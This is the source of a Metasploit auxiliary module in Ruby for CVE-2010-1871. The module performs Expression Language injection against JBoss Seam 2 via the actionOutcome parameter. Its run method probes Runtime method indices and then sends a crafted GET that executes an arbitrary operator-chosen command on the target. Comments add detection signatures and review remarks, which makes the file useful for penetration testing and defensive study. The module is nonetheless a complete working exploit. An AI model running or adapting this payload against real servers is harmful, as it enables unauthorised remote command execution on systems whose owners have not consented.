##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for CVE-2010-1871: JBoss Expression Language (EL) injection
# through the `actionOutcome` request parameter of a JBoss Seam 2 page.
#
# Everything this module does is a plain HTTP GET whose query string carries
# the EL expression, so every probe and the final command request land in the
# target's access logs (see 'SideEffects' => [IOC_IN_LOGS] below). Requests
# whose `actionOutcome=` value contains `%23{` (an encoded `#{`) together with
# `expressions.getClass().forName(` are therefore the detection signature for
# this activity. As the description notes, the issue only applies when the
# Java Security Manager is not properly configured.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and its options (RPORT, TARGETURI, CMD).
  #
  # @param info [Hash] module info merged into the defaults via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'JBoss Seam 2 Remote Command Execution',
        'Description' => %q{
          JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform
          4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression
          Language (EL) expressions, which allows remote attackers to execute arbitrary code
          via a crafted URL. This modules also has been tested successfully against IBM
          WebSphere 6.1 running on iSeries.

          NOTE: this is only a vulnerability when the Java Security Manager is not properly
          configured.
        },
        'Author' => [
          'guerrino di massa', # Metasploit module
          'Cristiano Maruti <cmaruti[at]gmail.com>' # Support for IBM Websphere 6.1
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2010-1871'],
          ['OSVDB', '66881']
        ],
        'DisclosureDate' => '2010-07-19',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [ true, 'Target URI', '/seam-booking/home.seam']),
        OptString.new('CMD', [ true, 'The command to execute.'])
      ]
    )
  end

  # Two-phase run.
  #
  # Phase 1 sends 25 GET probes (index 0..24). Each asks the target to evaluate
  # `getDeclaredMethods()[index]` on java.lang.Runtime and inspects the
  # redirect `Location` header of the reply: a match on
  # `java.lang.Runtime.exec(java.lang.String)` (URL-encoded in the regex)
  # records the index in flag_found_one, a match on `getRuntime` records it in
  # flag_found_two. 255 is the "not found" sentinel for both. The indices are
  # discovered at run time, presumably because the order returned by
  # getDeclaredMethods() is not fixed across JVMs. The loop never breaks
  # early, so all 25 probes are always sent.
  #
  # Phase 2 runs only when both indices were found: a single GET carries the
  # URI-encoded CMD, and a `Location` containing `pwned=java.lang.UNIXProcess`
  # is reported as success. Output is limited to print_* status lines; the
  # command's own output is not retrieved.
  def run
    # Base path from TARGETURI; the EL expression is appended as the query string.
    uri = normalize_uri(target_uri.to_s)
    # CMD is URI-encoded because it travels inside the GET query string.
    cmd_enc = ''
    cmd_enc << Rex::Text.uri_encode(datastore['CMD'])

    # "not found" sentinels, checked against 255 after the probe loop
    flag_found_one = 255
    flag_found_two = 255

    # %3d%23{ decodes to "=#{": the EL immediate-evaluation opener injected
    # through the actionOutcome parameter.
    uri_part_1 = "?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
    uri_part_2 = "].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
    uri_part_3 = "].invoke(null),'"

    25.times do |index|
      # probe: "<part_1><index>]}" — the raw index is not encoded
      req = uri + uri_part_1 + index.to_s + ']}'

      # second argument is the per-request timeout — looks like seconds;
      # confirm against HttpClient#send_request_cgi
      res = send_request_cgi(
        {
          'uri' => req,
          'method' => 'GET'
        }, 20
      )

      # NOTE(review): the '.' characters in these patterns are unescaped and so
      # match any character; harmless here, but `\.` would be more precise.
      if res && res.headers['Location'] =~ /java.lang.Runtime.exec%28java.lang.String%29/
        flag_found_one = index
        print_status('Found right index at [' + index.to_s + '] - exec')
      elsif res && res.headers['Location'] =~ /java.lang.Runtime\+java.lang.Runtime.getRuntime/
        print_status('Found right index at [' + index.to_s + '] - getRuntime')
        flag_found_two = index
      else
        print_status("Index [#{index}]")
      end
    end

    # Both indices are required to build the exec(getRuntime(), CMD) expression.
    if flag_found_one != 255 && flag_found_two != 255
      print_status('Target appears VULNERABLE!')
      print_status('Sending remote command:' + datastore['CMD'])

      # "<part_1><exec idx><part_2><getRuntime idx><part_3><encoded CMD>')}"
      req = uri + uri_part_1 + flag_found_one.to_s + uri_part_2 + flag_found_two.to_s + uri_part_3 + cmd_enc + "')}"

      res = send_request_cgi(
        {
          'uri' => req,
          'method' => 'GET'
        }, 20
      )

      # Success is inferred solely from the redirect target; no command output
      # is returned to the operator.
      if res && res.headers['Location'] =~ /pwned=java.lang.UNIXProcess/
        print_good('Exploited successfully')
      else
        print_error('Exploit failed')
      end
    else
      print_error('Target appears not vulnerable!')
    end
  end
end